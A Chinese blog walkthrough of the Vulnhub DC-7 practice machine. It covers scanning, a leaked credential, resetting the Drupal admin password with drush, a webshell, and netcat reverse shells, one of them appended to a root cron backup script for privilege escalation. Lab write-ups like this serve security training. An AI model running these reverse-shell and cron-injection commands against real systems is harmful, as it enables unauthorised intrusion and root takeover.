Vulnhub靶场 | DC系列 - DC7

于 2024-08-31 18:00:00 发布
阅读量624 收藏 16
点赞数 18
分类专栏: 一起来打靶!~ 文章标签: dc靶场 Vulnhub靶场 DC系列
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45305211/article/details/141730473
版权

文章目录

DC-7

环境搭建

  1. 靶机镜像下载地址:https://vulnhub.com/entry/dc-6,315/
  2. 需要将靶机和 kali 攻击机放在同一个局域网里;
  3. 本实验kali 的 IP 地址:192.168.10.146。

渗透测试

使用 nmap 扫描 192.168.10.0/24 网段存活主机

┌──(root💀kali)-[~/桌面]
└─# nmap -sP 192.168.10.0/24

经判断,目标主机IP地址为192.168.10.152。

扫描开放的服务。

┌──(root💀kali)-[~/桌面]
└─# nmap -sS 192.168.10.152

扫描软件版本

┌──(root💀kali)-[~/桌面]
└─# nmap -sV -p 22,80 192.168.10.152

直接访问web服务。

使用nikto扫一下~

┌──(root💀kali)-[~/桌面]
└─# nikto -h 192.168.10.152

发现robots.txt文件,这也是web中的比较重要的敏感文件。

通过探索CMS漏洞、apache漏洞等,都没有发现利用的点。

靶机的信息告诉我们跳出思维惯性,页面的最先面有一个@DC7USER,既然是@开头,大概率是某个账号信息。所以尝试去谷歌或者github搜索@DC7USER。

https://github.com/Dc7User/staffdb

https://github.com/Dc7User/staffdb/blob/master/config.php

原来这里存在源码泄露~(这…脑洞得多大才能想出来)

在配置文件config.php中存在一个用户名和密码:

  • dc7user:MdR3xOgB7#dW

尝试登录下网站~

但是,登录不成功。

尝试使用该用户名和密码,ssh登录成功。

开始提权

使用find / -perm -u=s 2>/dev/null查找设置了suid文件。

使用sudo -l 看一下自己的sudo授权,提示没有该命令,但是有个新邮件。

dc7user@dc-7:~$ cat /var/mail/dc7user

邮件中提到了两个文件,一个/opt/scripts/backups.sh/home/dc7user/backups/website.sql

查看/opt/scripts/backups.sh内容

貌似是为了备份网站的脚本。

该文件的权限如下

对于当前的dc7user用户来说没有写权限,如果想再该脚本中写入代码,需要是root用户或者属于www-data组。因此还是需要从网站入手,拿到www-data用户权限。

其中 drush 命令,是为了管理drupal网站的工具。(输入drush <回车>可以查看drush可以执行的操作)。

以下命令是为了将数据库进行备份。

drush sql-dump --result-file=/home/dc7user/backups/website.sql

尝试使用drush修改管理员admin的密码

dc7user@dc-7:~$ drush user-password admin --password="123"

直接修改不成功,需要先切换到/var/www/html目录

dc7user@dc-7:~$ cd /var/www/html
dc7user@dc-7:/var/www/html$ drush user-password admin --password="123"

使用修改后的密码登录网站成功。

接下来想办法写马,获取到webshell。

直接将马写在文章中,不行,直接原样输出了。

有上传图片的位置,尝试下图片马,很不幸失败了~

在Drupal官网上查询,

使用中国蚁剑连接

使用nc反弹shell到kali

┌──(root💀kali)-[~/桌面]
└─# nc -lvvp 5555    // kali监听

// 蚁剑连接
(www-data:/var/www/html) $ nc 192.168.10.146 5555 -e /bin/bash

使用python获得个交互shell。

www-data@dc-7:/var/www/html$ echo "nc 192.168.10.146 3333 -e /bin/bash" >> /opt/scripts/backups.sh

kali监听,等待计划任务开启,建立连接

📌参考链接

_leyilea
关注
  • 18
    点赞
  • 16
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Vulnhub靶场 DC系列 DC-4靶场
sdfsergfr的博客
12-10 364
Vulnhub靶场 CD系列 CD-4靶场 ,黑盒实验,反弹shell网站,利用22端口ssh服务,kali密码爆破,得到admin用户的密码happy,登录admin用户 bp对radio位置的发送,得到密码字典 old-passwords.bak。添加反弹shell,得到密码字典 old-passwords.bak。九头蛇hydra:利用密码字典发现ssh的账号:jim密码: jibril04 。finalshell ssh连接 对文件查找 得到用户:Charles 密码:^xHhA&hvim0y。
vulnhub靶场实战系列-DC-3实战
05-20
vulnhub靶场实战系列-DC-3实战
Vulnhub靶场 | DC系列 - DC1
哦 卷!
07-13 1172
发现该网站是 drupal[//]: # (Drupal是使用PHP语言编写的开源内容管理框架(CMF),它由内容管理系统(CMS)和PHP开发框架(Framework)共同构成,在GPL2.0及更新协议下发布。根据上面flag1.txt的提示,在网站目录中寻找相应的配置文件(当然没有提示,也应该寻找看一下,毕竟是敏感文件)。,则需要登录flag4用户。查看 users 表中的内容:由于列数比较多,查看内容比较乱,可以使用。尝试查看flag4用户的家目录,确实存在flag4.txt文件,
Vulnhub靶场 | DC系列 - DC2
哦 卷!
07-13 895
WPScan能够扫描WordPress网站中的多种安全漏洞,其中包括WordPress本身的漏洞、插件漏洞和主题漏洞,它不仅能够扫描类似robots.txt这样的敏感文件,而且还能够检测当前已启用的插件和其他功能。提示告诉我们,不能再利用WordPress了~ 但是通过刚该是的namp扫描只扫到了一个80端口(这里注意:默认扫描的端口是常见的 1000个端口)。而因为是WordPress,比较知名的cms,所以可以先尝试一下默认的后台地址,果然,有一个7744端口,并且对应的服务是ssh。
Vulnhub靶场 | DC系列 - DC3
哦 卷!
08-30 430
浏览器访问目标网站的 error.php文件(写入马的文件):http://192.168.10.149/templates/protostar/error.php。在msf中搜索joomla相关的脚本,使用joomla_version探测下joomla的版本。文本写的是漏洞产生的原因、描述和漏洞利用的方法,还附上了exp,就是最后一行的链接。根据joomla的特性,可以在模版中编辑模版文件,所以可以利用这一点进行写马。查找一下设置了suid的文件,并没有可以提权的命令。但是获取到的shell权限比较低。
Vulnhub靶场 | DC系列 - DC4
哦 卷!
08-31 494
teehee命令可以往一个文件追加内容,可以通过它向/etc/passwd写入内容,新增一个超级用户。爆破出来的用户名为admin,密码为happy,成功登录(也许这里真的是需要爆破来突破)。查看邮件jim,是charles发来的一封邮件,告诉了jim密码:^xHhA&hvim0y。查看了下,charles、sam的家目录下没有什么东西。有邮件,说明该系统时候邮件系统的,查看一下邮件。看一下jim的sudo授权,并没有可利用的~看一下mbox,有权限查看,是一封邮件。jim家目录下有两个文件,一个目录。
vulnhub靶场实战系列-DC-2实战
05-18
vulnhub靶场实战系列-DC-2实战
vulnhub靶场实战系列-DC-1实战流程图
05-17
VulnHub渗透测试靶场- DC-8
11-21
DC-8 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这个挑战有点像实际挑战和“概念验证”,即在 Linux 上安装和配置的双因素身份验证是否可以防止 Linux 服务器被利用。 此挑战的“概念...
公路工程监理质量工作流程图大全120页.doc
08-31
公路工程监理质量工作流程图大全120页.doc
单片机资料c源码数组单片机资料c源码数组
08-31
单片机资料c源码数组单片机资料c源码数组提取方式是百度网盘分享地址
常用芯片手册芯片资料MC14051B常用芯片手册芯片资料MC14051B
最新发布
08-31
常用芯片手册芯片资料MC14051B常用芯片手册芯片资料MC14051B提取方式是百度网盘分享地址
260【93页PPT】未来乡村规划总体规划-构建乡村治理新体系(豪华版).pptx
08-31
260【93页PPT】未来乡村规划总体规划-构建乡村治理新体系(豪华版).pptx
常用芯片手册芯片资料LM311常用芯片手册芯片资料LM311
08-31
常用芯片手册芯片资料LM311常用芯片手册芯片资料LM311提取方式是百度网盘分享地址
【Java设计模式-源码】事件聚合器模式在Java中的应用:优化大型应用程序的事件管理
08-31
Event-Driven Architecture(EDA)旨在围绕事件的产生、检测、消费和响应来协调行为。这种架构使事件生产者和消费者之间能够实现高度解耦、可扩展和动态的互连。 **二、别名** * Event-Driven System * Event-Based Architecture **三、Event-Driven Architecture 设计模式的意图** Event-Driven Architecture(EDA)旨在围绕事件的产生、检测、消费和对事件的反应来编排行为。这种架构能够实现事件生产者和消费者之间高度解耦、可扩展和动态的互连。 **四、通过实际示例详细解释 Event-Driven Architecture 模式** 实际示例: > 空中交通管制系统的运行是 Event-Driven Architecture(EDA)模式的一个实际示例。在这个系统中,诸如飞机进入空域、天气条件变化和地面车辆移动等事件会触发特定的响应,如改变飞行路径、安排登机口分配和更新跑道使用情况。这种设置允许对机场运营进行高效、响应迅速和安全的管理,反映了 EDA 的异步通信和
SQLAlchemy-2.0.1-cp39-cp39-macosx_11_0_arm64.whl
08-31
SQLAlchemy 是一个 SQL 工具包和对象关系映射(ORM)库,用于 Python 编程语言。它提供了一个高级的 SQL 工具和对象关系映射工具,允许开发者以 Python 类和对象的形式操作数据库,而无需编写大量的 SQL 语句。SQLAlchemy 建立在 DBAPI 之上,支持多种数据库后端,如 SQLite, MySQL, PostgreSQL 等。 SQLAlchemy 的核心功能: 对象关系映射(ORM): SQLAlchemy 允许开发者使用 Python 类来表示数据库表,使用类的实例表示表中的行。 开发者可以定义类之间的关系(如一对多、多对多),SQLAlchemy 会自动处理这些关系在数据库中的映射。 通过 ORM,开发者可以像操作 Python 对象一样操作数据库,这大大简化了数据库操作的复杂性。 表达式语言: SQLAlchemy 提供了一个丰富的 SQL 表达式语言,允许开发者以 Python 表达式的方式编写复杂的 SQL 查询。 表达式语言提供了对 SQL 语句的灵活控制,同时保持了代码的可读性和可维护性。 数据库引擎和连接池: SQLAlchemy 支持多种数据库后端,并且为每种后端提供了对应的数据库引擎。 它还提供了连接池管理功能,以优化数据库连接的创建、使用和释放。 会话管理: SQLAlchemy 使用会话(Session)来管理对象的持久化状态。 会话提供了一个工作单元(unit of work)和身份映射(identity map)的概念,使得对象的状态管理和查询更加高效。 事件系统: SQLAlchemy 提供了一个事件系统,允许开发者在 ORM 的各个生命周期阶段插入自定义的钩子函数。 这使得开发者可以在对象加载、修改、删除等操作时执行额外的逻辑。
slim-0.6.0a5-py3-none-any.whl
08-31
whl软件包,直接pip install安装即可
常用芯片手册芯片资料cd4013常用芯片手册芯片资料cd4013
08-31
常用芯片手册芯片资料cd4013常用芯片手册芯片资料cd4013提取方式是百度网盘分享地址
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值